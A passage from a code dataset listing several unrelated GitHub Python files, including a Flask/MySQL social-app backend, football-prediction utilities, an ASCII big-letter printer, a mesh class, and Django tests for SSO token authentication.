json.dumps({'response': 'error'}), 400\n\n\n@app.route('/messages')\ndef messages():\n if session.get('user'):\n return render_template('messages.html')\n\n\n@app.route('/messages/<user_id>', methods=['GET'])\ndef view_messages(user_id):\n if session.get('user'):\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getMessagesForUser', (session.get('user'), user_id))\n messages = cursor.fetchall()\n messages_list = []\n\n for message in messages:\n message_dict = {\n 'mid': message[0],\n 'fromuser': message[1],\n 'body': message[2],\n 'timestamp': message[3],\n 'touser': message[4],\n }\n messages_list.append(message_dict)\n\n cursor.close()\n cursor = conn.cursor()\n cursor.callproc('sp_getUserName', (user_id,))\n\n other_user = cursor.fetchall()\n\n return render_template('message-list.html', messages_list=messages_list,\n user_id=session.get('user'),\n other_user=other_user[0][0],\n other_user_id=user_id)\n\n\n@app.route('/messages/<user_id>', methods=['POST'])\ndef send_message(user_id):\n if session.get('user'):\n _message = request.form['message']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_createMessage', (session.get('user'), user_id, _message))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return render_template('message.html', message=_message)\n\n else:\n return json.dumps({'response': 'error'}), 400\n\n\n@app.route('/friends')\ndef friends():\n if session.get('user'):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getFriends', (session.get('user'),))\n friends = cursor.fetchall()\n\n friend_list = []\n\n for friend in friends:\n friend_dict = {\n 'id': friend[0],\n 'name': friend[1]\n }\n friend_list.append(friend_dict)\n\n return json.dumps(friend_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n@app.route('/logout')\ndef logout():\n session.pop('user', None)\n return redirect('/')\n\n\n@app.route('/error')\ndef error():\n return render_template('error', error='Sorry there was a problem with your request.')\n\n\n@app.route('/tags')\ndef tags():\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM topics\")\n tags = cursor.fetchall()\n tags = [element for tupl in tags for element in tupl]\n return json.dumps(tags)\n\n\n@app.route('/my-posts')\ndef my_posts():\n if session.get('user'):\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getMyPosts', (session.get('user'),))\n posts = cursor.fetchall()\n\n post_list = []\n\n for post in posts:\n post_dict = {\n 'pid': post[0],\n 'timestamp': post[1],\n 'author': post[2],\n 'body': post[3],\n 'tags': post[4].split(',') if post[4] is not None else [],\n 'favorites': post[5]\n }\n post_list.append(post_dict)\n return render_template('my-posts.html', posts=post_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n\n@app.route('/posts/<post_id>', methods=['PUT'])\ndef update_post(post_id):\n _user = session.get('user')\n _post = request.form['post']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('sp_updatePost', (post_id, _post, _user))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n cursor.close()\n return json.dumps({'response': 'success'})\n else:\n return json.dumps({'error': str(data[0])}), 400\n\n\n@app.route('/posts/<post_id>', methods=['DELETE'])\ndef delete_post(post_id):\n _user = session.get('user')\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('sp_deletePost', (post_id, _user))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n cursor.close()\n return json.dumps({'response': 'success'})\n else:\n return json.dumps({'error': str(data[0])}), 400\n\n\n@app.template_filter('date')\ndef date_filter(_date):\n if _date > datetime.now() - timedelta(seconds=60):\n return 'a few seconds ago'\n elif _date > datetime.now() - timedelta(minutes=15):\n return 'a few minutes ago'\n elif _date > datetime.combine(date.today(), time.min):\n return 'today'\n elif _date > datetime.combine(date.today(), time.min) - timedelta(days=1):\n return 'yesterday'\n else:\n return _date.strftime('%a %b %e %y')\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"kalpert/DBDesign","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32427898466","text":"GLOBAL_CONFIG_FILE = \"/etc/tuned/tuned-main.conf\"\nACTIVE_PROFILE_FILE = \"/etc/tuned/active_profile\"\nAUTODETECT_FILE = \"recommend.conf\"\nDAEMONIZE_PARENT_TIMEOUT = 5\nDBUS_BUS = \"com.redhat.tuned\"\nDBUS_INTERFACE = \"com.redhat.tuned.control\"\nDBUS_OBJECT = \"/Tuned\"\nDEFAULT_PROFILE = \"balanced\"\nDEFAULT_STORAGE_FILE = \"/run/tuned/save.pickle\"\nLOAD_DIRECTORIES = [\"/usr/lib/tuned\", \"/etc/tuned\"]\nPLUGINS_STORE = [\"/usr/lib/python*/site-packages/tuned/plugins/\"]\nCONF_PROFILE_FILE = \"/tuned.conf\"\n# number of backups\nLOG_FILE_COUNT = 2\nLOG_FILE_MAXBYTES = 100*1000\nLOG_FILE = \"/var/log/tuned/tuned.log\"\nPID_FILE = \"/run/tuned/tuned.pid\"\nSYSTEM_RELEASE_FILE = \"/etc/system-release-cpe\"\nPREFIX_FACTORY = \"Factory\"\nPREFIX_USER = \"User\"\n\n# default configuration\nCFG_DEF_DYNAMIC_TUNING = True\n# how long to sleep before checking for events (in seconds)\nCFG_DEF_SLEEP_INTERVAL = 1\n# update interval for dynamic tuning (in seconds)\nCFG_DEF_UPDATE_INTERVAL = 10\n","repo_name":"mstana/tuned","sub_path":"tuned/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4225209389","text":"import jsonpickle\n\nclass Cat:\n\tdef __init__(self, name, breed):\n\t\tself.name = name\n\t\tself.breed = breed\n\tc = Cat('Charles', 'Toby')\n\n\t#j = json.dump(c.__dict__)\n\nwith open('cat.json', 'w') as file:\n\tfrozen = jsonpickle.encode(c) #creates file and adds in \n\tfile.write(frozen)\n","repo_name":"Princivil/Software-Dev","sub_path":"Python/Practice/json_demo.py","file_name":"json_demo.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73285216904","text":"import matplotlib.pyplot as plt\nimport hippoFileUtils as hfu\n\n\ntime_vj_5000 = hfu.readTrainingData('20171025_vj_5000_19_train.txt')\nfor i in range(1, len(time_vj_5000)):\n\ttime_vj_5000[i] += time_vj_5000[i-1]\n\ntime_gauss = hfu.readTrainingData('20180125_fuzzy_gauss2_train.txt')\ntime_gauss[0] /= 1000\nfor i in range(1, len(time_gauss)):\n\ttime_gauss[i] /= 1000\n\ttime_gauss[i] += time_gauss[i-1]\n\ntime_tri = hfu.readTrainingData('20180118_fuzzy_tri_std3_19_train.txt')\nfor i in range(1, len(time_tri)):\n\ttime_tri[i] += time_tri[i-1]\n\nerr_vj_5000 = hfu.readErr('20171025_vj_5000_19_test.txt')\nerr_gauss = hfu.readErr('20180125_fuzzy_gauss2_test.txt')\nerr_tri = hfu.readErr('20180118_fuzzy_tri_std3_19_test.txt')\n\nerr_vj_5000 = [100*x for x in err_vj_5000]\nerr_gauss = [100*x for x in err_gauss]\nerr_tri = [100*x for x in err_tri]\n\nplt.figure(1)\nplt.subplot(111)\nplt.plot(time_vj_5000, err_vj_5000, 'k:', linewidth = 1.5, label = 'Viola-Jones with K\\' = 5000')\nplt.plot(time_tri, err_tri, 'b--', linewidth = 1.5, label = r'Triangular MF - $\\gamma = 3$')\nplt.plot(time_gauss, err_gauss, 'm-', linewidth = 1.5, label = r'Improved Gaussian MF $\\gamma = 2$')\nplt.title('Error vs. Training time by MIT cbcl dataset')\nplt.xlim(0, 3500)\nplt.xlabel('Training time (second)')\nplt.ylabel('Error (%)')\nplt.legend()\n#plt.show()\n\nplt.savefig('20180124_all_err_19.png')","repo_name":"danhdoan/AdaBoost-with-Fuzzy-MF","sub_path":"plotFigures/err_19/plotError.py","file_name":"plotError.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7826134934","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n \n def reverseList(self, head):\n prev = None\n curr = head\n \n while curr:\n next = curr.next\n curr.next = prev\n prev = curr\n curr = next\n \n return prev\n\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n slow, fast = head, head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n \n reversed_head = self.reverseList(slow)\n\n while head and reversed_head:\n if head.val != reversed_head.val:\n return False\n head = head.next\n reversed_head = reversed_head.next\n return True\n \n","repo_name":"johnteye/A2SV--Onboarding-Phase","sub_path":"PalindromeLinkedList.py","file_name":"PalindromeLinkedList.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41996618518","text":"\"\"\"Utilities for generating new columns for football predictions.\"\"\"\n\nfrom numpy import log2\nimport pandas as pd\n\n\ndef get_teams_in_frame(frame):\n \"\"\"Return a Series of names of teams in the frame.\"\"\"\n return frame[\"home\"].unique()\n\n\n# Helper functions for extracting a team's games for a season\n\n\ndef games_with_team(name, frame):\n \"\"\"Return a Frame of games including named team.\"\"\"\n return frame[(frame[\"home\"] == name) | (frame[\"visitor\"] == name)]\n\n\ndef games_in_season(season, frame, before=None, tier=None):\n \"\"\"\n Return a Frame including games from the specified season.\n\n Optional filtering by date (before) and tier (tier).\n \"\"\"\n season = frame[frame[\"Season\"] == season]\n if before is not None:\n season = season[season[\"Date\"] < before]\n if tier is not None:\n season = season[season[\"tier\"] == tier]\n return season\n\n\ndef get_history_frame(team, season, frame, before=None):\n \"\"\"Return Frame containing specified team's games from season.\"\"\"\n with_team = games_with_team(team, frame)\n in_season = games_in_season(season, with_team, before=before)\n return in_season\n\n\n# Add columns for a teams results so far\n\nhome_result = {\"H\": \"W\", \"D\": \"D\", \"A\": \"L\"}\naway_result = {\"H\": \"L\", \"D\": \"D\", \"A\": \"W\"}\nresult_to_points_pre_1981 = {\"W\": 2, \"D\": 1, \"L\": 0}\nresult_to_points = {\"W\": 3, \"D\": 1, \"L\": 0}\n\n\ndef create_history_series(season):\n \"\"\"Return home and away history series for given season.\"\"\"\n home_histories = []\n away_histories = []\n for team in get_teams_in_frame(season):\n # Extract home and away matches for team\n home_results = season[season[\"home\"] == team].copy()\n away_results = season[season[\"visitor\"] == team].copy()\n\n # Translate A/D/H results into L/D/W for home and W/D/L for away\n home_results[\"team_result\"] = home_results[\"result\"].map(home_result)\n away_results[\"team_result\"] = away_results[\"result\"].map(away_result)\n\n # Put the season's matches back together\n team_results = pd.concat([home_results, away_results]).sort_index()\n\n # Get cumulative results so far (removing current match)\n team_results[\"form\"] = team_results[\"team_result\"].cumsum().str[:-1]\n team_results[\"points\"] = (\n team_results[\"team_result\"]\n .map(result_to_points)\n .shift(fill_value=0)\n .cumsum()\n )\n\n # Re-extract home and away series\n home_bool = team_results[\"home\"] == team\n home_history = team_results[home_bool][[\"form\", \"points\"]]\n away_history = team_results[~home_bool][[\"form\", \"points\"]]\n\n # Add this team's form to the list of home/away forms\n home_histories.append(home_history)\n away_histories.append(away_history)\n\n # Turn the lists of forms into pandas series and then return the pair\n all_home = pd.concat(home_histories)\n all_away = pd.concat(away_histories)\n return all_home, all_away\n\n\ndef game_to_result(game, team):\n \"\"\"\n Translate a game into a result for the specified team.\n\n Result given in the form of W/L/D.\n \"\"\"\n if game[\"home\"] == team:\n return home_result[game[\"result\"]]\n else:\n return away_result[game[\"result\"]]\n\n\ndef get_history_string(team, season, frame, before=None):\n \"\"\"Get a string representing the historical performance of the team in the season to date.\"\"\"\n hist_frame = get_history_frame(team, season, frame, before)\n result_series = hist_frame.apply(lambda x: game_to_result(x, team), axis=1)\n return \"\".join(result_series.values.tolist())\n\n\npoints_dict = {\"W\": 3, \"D\": 1, \"L\": 0}\n\n\n# This is a pretty weird way to do things.\n# I think I should revisit this whole approach.\n\n\ndef points_from_history(s):\n \"\"\"Translate a history string into a number of points.\"\"\"\n return sum([points_dict[x] for x in s])\n\n\n# Also useful, as a comparison, the final record of results and points for a season\n\n\ndef get_full_season(team, season, frame):\n \"\"\"Get full season as a string.\"\"\"\n hf = get_history_frame(team, season, frame)\n return hf.values.tolist()[-1][\"home_history\"]\n\n\ndef score_log(prediction, result):\n \"\"\"Return log score of predictions given results.\"\"\"\n return log2((prediction * result).sum(axis=1))\n\n\ndef score_brier(prediction, result):\n \"\"\"Return Brier score of prediction given results.\"\"\"\n return ((result - prediction) ** 2).sum(axis=1)\n\n\ndef gen_score_list(prediction, result, title, printout=True):\n \"\"\"Create score list for the score frame.\"\"\"\n ret = [\n title,\n score_log(prediction, result).mean(),\n score_brier(prediction, result).mean(),\n ]\n if printout:\n print_score_list(ret)\n return ret\n\n\ndef print_score_list(in_list):\n \"\"\"Print score list.\"\"\"\n print(f\"{in_list[0]} mean scores:\")\n print(f\" Log score: {in_list[1]}\")\n print(f\" Brier score: {in_list[2]}\")\n\n\ndef print_scores(prediction, result, title):\n \"\"\"Print scores of predictions given results.\"\"\"\n print_score_list(gen_score_list(prediction, result, title))\n\n\ndef normalise_column(series):\n \"\"\"Return min/max normalisation of a column.\"\"\"\n return (series - series.min()) / (series.max() - series.min())\n\n\ndef prob_frame_to_prediction(game_frame, col_name, prob_frame):\n \"\"\"\n Return a prediction frame based on the input game frame and prob frame.\n\n The col_name must be a data column whose entries match\n the keys to the prob_frame.\n \"\"\"\n w = game_frame[col_name].map(prob_frame[\"home_win\"])\n d = game_frame[col_name].map(prob_frame[\"draw\"])\n l = game_frame[col_name].map(prob_frame[\"home_loss\"])\n prediction = pd.concat(\n [w.rename(\"home_win\"), d.rename(\"draw\"), l.rename(\"home_loss\")],\n axis=1,\n )\n return prediction\n\n\ndef create_form_scores(train_frame, test_frame, length):\n \"\"\"\n Create lists of scores for home, away and unknown form of length length.\n\n Function does not check whether shorter game histories have been removed.\n \"\"\"\n print(\"Generating form prediction scores for length \" + str(length))\n # Copy the dataframe and generate form columns of the right length.\n\n values = [\"home_loss\", \"draw\", \"home_win\"]\n base_home_history = \"home_history\"\n base_away_history = \"away_history\"\n train = train_frame.copy()\n test = test_frame.copy()\n for frame in [test, train]:\n frame[\"form_home\"] = frame[base_home_history].str[-length:]\n frame[\"form_away\"] = frame[base_away_history].str[-length:]\n\n form_vc = train[\"form_home\"].value_counts()\n print(\n f\"Minimum value count {form_vc.min()}, length {len(form_vc)} out of {3**length}\"\n )\n\n # Generate home and away form probabilities\n # Use the fact that pivot table defaults to mean, to extract win/lose/draw\n # probabilities for each game history.\n\n probs_frame_home = train.pivot_table(index=\"form_home\", values=values)\n\n probs_frame_away = train.pivot_table(index=\"form_away\", values=values)\n\n # Generate unknown form probabilities\n home_counts = train[\"form_home\"].value_counts()\n away_counts = train[\"form_away\"].value_counts()\n\n weights = home_counts / (home_counts + away_counts)\n\n probs_frame_unknown = probs_frame_home.mul(weights, axis=0) + probs_frame_away.mul(\n 1 - weights, axis=0\n )\n\n # Generate predictions\n form_home_prediction = prob_frame_to_prediction(test, \"form_home\", probs_frame_home)\n\n form_away_prediction = prob_frame_to_prediction(test, \"form_away\", probs_frame_away)\n\n form_unknown_prediction = prob_frame_to_prediction(\n test, \"form_home\", probs_frame_unknown\n )\n\n # Extract results:\n results_bools = test[values]\n\n # Score predictions\n form_home_score = gen_score_list(\n form_home_prediction, results_bools, f\"Form ({length}, home)\", printout=False\n )\n\n form_away_score = gen_score_list(\n form_away_prediction, results_bools, f\"Form ({length}, away)\", printout=False\n )\n\n form_unknown_score = gen_score_list(\n form_unknown_prediction,\n results_bools,\n f\"Form ({length}, unknown)\",\n printout=False,\n )\n\n return [form_home_score, form_away_score, form_unknown_score]\n\n\ndef create_both_form_scores(train_frame, test_frame, length):\n \"\"\"\n Create score_list using predictions from both teams.\n\n Even with the full dataframe, this will only really work up to\n length=3.\n \"\"\"\n print(\"Generating form prediction scores for length \" + str(length))\n # Copy the dataframe and generate form columns of the right length.\n values = [\"home_loss\", \"draw\", \"home_win\"]\n base_home_history = \"home_history\"\n base_away_history = \"away_history\"\n df_train = train_frame.copy()\n df_test = test_frame.copy()\n\n for frame in [df_train, df_test]:\n frame[\"both_form\"] = (\n frame[base_home_history].str[-length:]\n + frame[base_away_history].str[-length:]\n )\n form_vc = df_train[\"both_form\"].value_counts()\n print(\n f\"Minimum value count {form_vc.min()}, length {len(form_vc)} out of {3**(length*2)}\"\n )\n\n # Extract results:\n results_bools = df_test[values]\n\n # Generate probabilities\n both_form_probs = df_train.pivot_table(index=\"both_form\", values=values)\n # Generate predictions\n both_form_prediction = prob_frame_to_prediction(\n df_test, \"both_form\", both_form_probs\n )\n\n return gen_score_list(\n both_form_prediction, results_bools, f\"Both form ({length})\", printout=False\n )\n","repo_name":"scmbradley/football-stats","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13596868020","text":"\"\"\"Replace input with self-made big letters.\"\"\"\r\n\r\nbig_letters = {\r\n \"let_a\": [\" ,===, \", \"|| ||\", \"||===||\", \"|| ||\", \"!! !!\"],\r\n \"let_b\": [\", ===, \", \"|| ||\", \"||===' \", \"|| ||\", \"''===' \"],\r\n \"let_c\": [\" ,===,\", \"|| \", \"|| \", \"|| \", \"''==='\"],\r\n \"let_d\": [\",====, \", \"|| ||\", \"|| ||\", \"|| ||\", \"'====' \"],\r\n \"let_e\": [\",=====,\", \"|| \", \"||=== \", \"|| \", \"'====='\"],\r\n \"let_f\": [\",=====,\", \"|| \", \"||=== \", \"|| \", \"!! \"],\r\n \"let_g\": [\" ,===, \", \"|| '\", \"|| ,,,\", \"|| ||\", \" '===' \"],\r\n \"let_h\": [\",, ,,\", \"|| ||\", \"||===||\", \"|| ||\", \"!! !!\"],\r\n \"let_i\": [\",,\", \"||\", \"||\", \"||\", \"!!\"],\r\n \"let_j\": [\" ,,\", \" ||\", \" ||\", \" ||\", \"'==''\"],\r\n \"let_k\": [\",, ,,\", \"|| // \", \"||<( \", \"|| \\\\\\\\ \", \"!! \\\\\\\\\"],\r\n \"let_l\": [\",, \", \"|| \", \"|| \", \"|| \", \"'===='\"],\r\n \"let_m\": [\",, ,,\", \"||\\\\ /||\", \"||\\\\\\\\//||\", \"|| '' ||\", \"!! !!\"],\r\n \"let_n\": [\",,, ,,\", \"||\\\\ ||\", \"||\\\\\\\\ ||\", \"|| \\\\\\\\||\", \"!! '!!\"],\r\n \"let_o\": [\" ,===, \", \"|| ||\", \"|| ||\", \"|| ||\", \" '===' \"],\r\n \"let_p\": [\", ===, \", \"|| ||\", \"||===' \", \"|| \", \"!! \"],\r\n \"let_q\": [\" ,===, \", \"|| || \", \"|| || \", \"|| || \", \" '==='==\"],\r\n \"let_r\": [\", ===, \", \"|| ||\", \"||===.'\", \"|| || \", \"!! !!\"],\r\n \"let_s\": [\" ,====,\", \"|| \", \" '===, \", \" ||\", \"'====' \"],\r\n \"let_t\": [\"==,==,==\", \" || \", \" || \", \" || \", \" !! \"],\r\n \"let_u\": [\",, ,,\", \"|| ||\", \"|| ||\", \"|| ||\", \" '===' \"],\r\n \"let_v\": [\",, ,,\", \"\\\\\\\\ //\", \" \\\\\\\\ // \", \" \\\\!/ \", \" v \"],\r\n \"let_w\": [\",, ,,\", \"|| ||\", \"|| ||\", \"|| || ||\", \" '=''=' \"],\r\n \"let_x\": [\",, ,,\", \" \\\\\\\\ // \", \" :x: \", \" // \\\\\\\\ \", \"!! !!\"],\r\n \"let_y\": [\",, ,,\", \" \\\\\\\\ // \", \" \\\\\\\\// \", \" || \", \" !! \"],\r\n \"let_z\": [\",====,\", \" // \", \" // \", \" // \", \"'===='\"],\r\n \"let_ \": [\" \", \" \", \" \", \" \", \" \"],\r\n \"let_-\": [\" \", \" \", \"===\", \" \", \" \"],\r\n \"let_~\": [\"| |\", \" | | \", \" | \", \" | | \", \"| |\"],\r\n}\r\n\r\n\r\ndef capitalize(sentence, line_length):\r\n \"\"\"Capitalize the input.\"\"\"\r\n part_list = split_sentence(sentence, line_length)\r\n for part in part_list:\r\n # for every part of the sentence,\r\n for num in range(5):\r\n # 5 times,\r\n print(\" \")\r\n # with newlines in between,\r\n for char in part:\r\n # for every character in the part,\r\n try:\r\n print(big_letters[\"let_\" + char.lower()][num], end=' ')\r\n # print, from the dictionary big_letters, the xth item\r\n # (num) of corresponding list; end with space instead\r\n # of a new line\r\n except KeyError:\r\n print(big_letters[\"let_~\"][num], end=' ')\r\n # but if no corresponding key is found for character,\r\n # print 'let_!' from the dictionary, which is a big X\r\n\r\n\r\ndef split_sentence(sentence, line_length):\r\n \"\"\"Split the sentence into parts to print out.\"\"\"\r\n word_list = sentence.split()\r\n part_list = []\r\n current_part = \"\"\r\n for word in word_list: # for every word in the word list,\r\n if len(current_part + word) <= int(line_length):\r\n # if length of current part + current word is less than allowed:\r\n current_part += word + \" \" # add word and space to current_part\r\n elif len(word) > int(line_length):\r\n # else, if word length is longer than allowed:\r\n part_list.append(current_part[:-1])\r\n current_part = \"\"\r\n # add current_part to word_list (except last character, which\r\n # is a space) and make current_part an empty string\r\n for char in range(0, len(word), int(line_length)):\r\n # then, for every xth character in the word, starting at the\r\n # first character:\r\n current_part += word[char:char + int(line_length)]\r\n # make a slice, starting at current character, and ending\r\n # before the xth character, and put it in current_part\r\n if len(current_part) == int(line_length):\r\n # if length of current_part is same as allowed length:\r\n part_list.append(current_part)\r\n # put current_part in part_list\r\n current_part = \"\"\r\n else:\r\n current_part += \" \"\r\n else:\r\n # but if length of current part + current word is longer than\r\n # allowed, and word length is shorter than allowed:\r\n part_list.append(current_part[:-1])\r\n current_part = \"\"\r\n current_part += word + \" \"\r\n # put current_part (except last character, which is a space),\r\n # in part_list, make current_part empty, and put word in\r\n # current_part\r\n part_list.append(current_part[:-1])\r\n return part_list\r\n\r\n\r\ndef update_history(history_list, sentence):\r\n \"\"\"Update the history list.\"\"\"\r\n history_list.append(sentence)\r\n if len(history_list) > 10:\r\n del history_list[0]\r\n\r\n\r\ndef run_program():\r\n \"\"\"Run the program.\"\"\"\r\n history_list = []\r\n while True:\r\n history_or_new = input(\"Would you like to write a new sentence (a), \"\r\n \"or pick a previous sentence from the history \"\r\n \"(b)? a/b: \")\r\n if history_or_new == \"b\":\r\n if history_list == []:\r\n print(\"History is currently empty! \")\r\n sentence = input(\"Type a sentence: \")\r\n update_history(history_list, sentence)\r\n else:\r\n for index, item in enumerate(history_list, start=1):\r\n print(str(index) + \". \" + item)\r\n choice = input(\"Choose a sentence: \")\r\n sentence = history_list[int(choice) - 1]\r\n else:\r\n sentence = input(\"Type a sentence: \")\r\n update_history(history_list, sentence)\r\n line_length = input(\"What is the max number of characters per line? \")\r\n capitalize(sentence, line_length)\r\n run_again = input(\"\\n\\nWould you like to run this program again? y/n: \")\r\n if run_again == \"y\":\r\n continue\r\n else:\r\n print(\"\\nThank you for using this program!\")\r\n break\r\n\r\n\r\nrun_program()\r\n","repo_name":"irene9508/big_letters","sub_path":"big_letters.py","file_name":"big_letters.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40407304648","text":"# mesh class should only hold meta data\nimport Fields\nimport MeshConfig\n\n\nclass cartesian2D():\n\n def __init__(self, len_x, len_y, res):\n ### a regular, rectangular mesh with nb of cells in [x,y] direction, according to dimensions parameter\n\n self.lenX = len_x\n self.lenY = len_y\n self.uniformSpacing = 1.0/res # this is a scalar, which is only valid for regular cartesian meshes. reciprocal distances could be a member of every mesh\n self.cells_x = int(res*self.lenX)\n self.cells_y = int(res*self.lenY)\n self.nbCells = self.cells_x*self.cells_y\n\n MeshConfig.SHAPE_SCALAR_CV = (self.cells_y, self.cells_x)\n# MeshConfig.SHAPE_SCALAR_CV_GHOST = (self.cells_y+2, self.cells_x+2)\n MeshConfig.SHAPE_FACES_U = (self.cells_y , self.cells_x + 1)\n MeshConfig.SHAPE_FACES_V = (self.cells_y + 1, self.cells_x)\n MeshConfig.SHAPE_VERTEX = (self.cells_y + 1, self.cells_x + 1)\n\n\n def calcInvCellDistance(self,direction):\n rDist = 1.0/self.uniformSpacing\n if direction == 'east' or direction == 'west':\n return Fields.newDataField(shape=MeshConfig.SHAPE_FACES_U, value=rDist)\n elif direction == 'north' or direction == 'south':\n return Fields.newDataField(shape=MeshConfig.SHAPE_FACES_V, value=rDist)\n\n\n def calcInvCellDistances(self):\n ### sets recCellDist as a parameterFaceField with inverse cell distances between internal cells and face-cell distance at boundary\n\n f_u = self.calcInvCellDistance('west')\n f_v = self.calcInvCellDistance('south')\n return (f_u, f_v)\n\n\n def calcFaceArea(self, direction):\n constArea = self.uniformSpacing**2\n# constArea = 1\n if direction == 'east' or direction == 'west':\n return Fields.newDataField(shape=MeshConfig.SHAPE_FACES_U, value=constArea)\n elif direction == 'north' or direction == 'south':\n return Fields.newDataField(shape=MeshConfig.SHAPE_FACES_V, value=constArea)\n\n def calcFaceAreas(self):\n # f_u = Fields.newDataField( shape=fGov.typeShapeDict['faces_u'], value=1.0 )\n # f_v = Fields.newDataField( shape=fGov.typeShapeDict['faces_v'], value=1.0 )\n f_u = self.calcFaceArea('east')\n f_v = self.calcFaceArea('south')\n\n return (f_u, f_v)\n\n def getShape(self):\n return MeshConfig.SHAPE_SCALAR_CV\n\n def getStats(self):\n print( self.nbCells )","repo_name":"fjaschmoneit/multiphase-test-bench","sub_path":"src/MultiphaseTestBench/Mesh.py","file_name":"Mesh.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4262732202","text":"from datetime import datetime, timedelta\n\nimport pytest\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.utils.timezone import utc\nfrom freezegun import freeze_time\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom datahub.company.test.factories import AdviserFactory\nfrom datahub.oauth.auth import SSOIntrospectionAuthentication\nfrom datahub.user_event_log.constants import UserEventType\nfrom datahub.user_event_log.models import UserEvent\n\nFROZEN_DATETIME = datetime(2020, 1, 1, 0, tzinfo=utc)\nSTAFF_SSO_INTROSPECT_URL = f'{settings.STAFF_SSO_BASE_URL}o/introspect/'\nEXAMPLE_SSO_EMAIL_USER_ID = 'user_id@example.test'\n\n\nclass IntrospectionAuthView(APIView):\n \"\"\"View using SSOIntrospectionAuthentication.\"\"\"\n\n authentication_classes = (SSOIntrospectionAuthentication,)\n permission_classes = ()\n\n def get(self, request):\n \"\"\"Simple test view with fixed response.\"\"\"\n return Response({'content': 'introspection-test-view'})\n\n\nview = IntrospectionAuthView.as_view()\n\n\ndef _make_introspection_data(**overrides):\n return {\n 'active': True,\n 'username': 'email@example.test',\n 'email_user_id': EXAMPLE_SSO_EMAIL_USER_ID,\n 'exp': (FROZEN_DATETIME + timedelta(hours=10)).timestamp(),\n **overrides,\n }\n\n\n@pytest.mark.django_db\n@pytest.mark.usefixtures('local_memory_cache')\n@freeze_time(FROZEN_DATETIME)\nclass TestSSOIntrospectionAuthentication:\n \"\"\"Tests for SSOIntrospectionAuthentication.\"\"\"\n\n @pytest.mark.parametrize(\n 'request_kwargs,expected_error',\n (\n pytest.param(\n {},\n 'Authentication credentials were not provided.',\n id='no-header',\n ),\n pytest.param(\n {'HTTP_AUTHORIZATION': 'wrong-scheme-no-space'},\n 'Incorrect authentication scheme.',\n id='wrong-scheme-no-space',\n ),\n pytest.param(\n {'HTTP_AUTHORIZATION': 'wrong-scheme 8jol80DF'},\n 'Incorrect authentication scheme.',\n id='wrong-scheme',\n ),\n pytest.param(\n {'HTTP_AUTHORIZATION': 'bearer'},\n 'Authentication credentials were not provided.',\n id='no-token',\n ),\n ),\n )\n def test_rejects_malformed_headers(\n self,\n api_request_factory,\n request_kwargs,\n expected_error,\n ):\n \"\"\"Test that errors are returned for various header values.\"\"\"\n request = api_request_factory.get('/test-path', **request_kwargs)\n response = view(request)\n\n assert response['WWW-Authenticate'] == 'Bearer realm=\"api\"'\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n assert response.data == {'detail': expected_error}\n assert not request.user\n\n @pytest.mark.parametrize(\n 'response_kwargs',\n (\n pytest.param(\n {\n 'status_code': status.HTTP_401_UNAUTHORIZED,\n 'json': {'active': False},\n },\n id='non-existent-token',\n ),\n pytest.param(\n {\n 'status_code': status.HTTP_200_OK,\n 'json': {},\n },\n id='inactive-response',\n ),\n pytest.param(\n {\n 'status_code': status.HTTP_200_OK,\n 'json': {'active': False},\n },\n id='expired-token',\n ),\n # Should not happen in reality\n pytest.param(\n {\n 'status_code': status.HTTP_200_OK,\n 'json': _make_introspection_data(exp=FROZEN_DATETIME.timestamp() - 1),\n },\n id='expired-token',\n ),\n ),\n )\n def test_authentication_fails_on_introspection_failure(\n self,\n response_kwargs,\n api_request_factory,\n requests_mock,\n ):\n \"\"\"Test that authentication fails and an error is returned when introspection fails.\"\"\"\n AdviserFactory(sso_email_user_id='user_id@example.test')\n requests_mock.post(STAFF_SSO_INTROSPECT_URL, **response_kwargs)\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n assert not request.user\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n assert response.data == {'detail': 'Invalid authentication credentials.'}\n\n def test_authenticates_if_noncached_token_provided(self, api_request_factory, 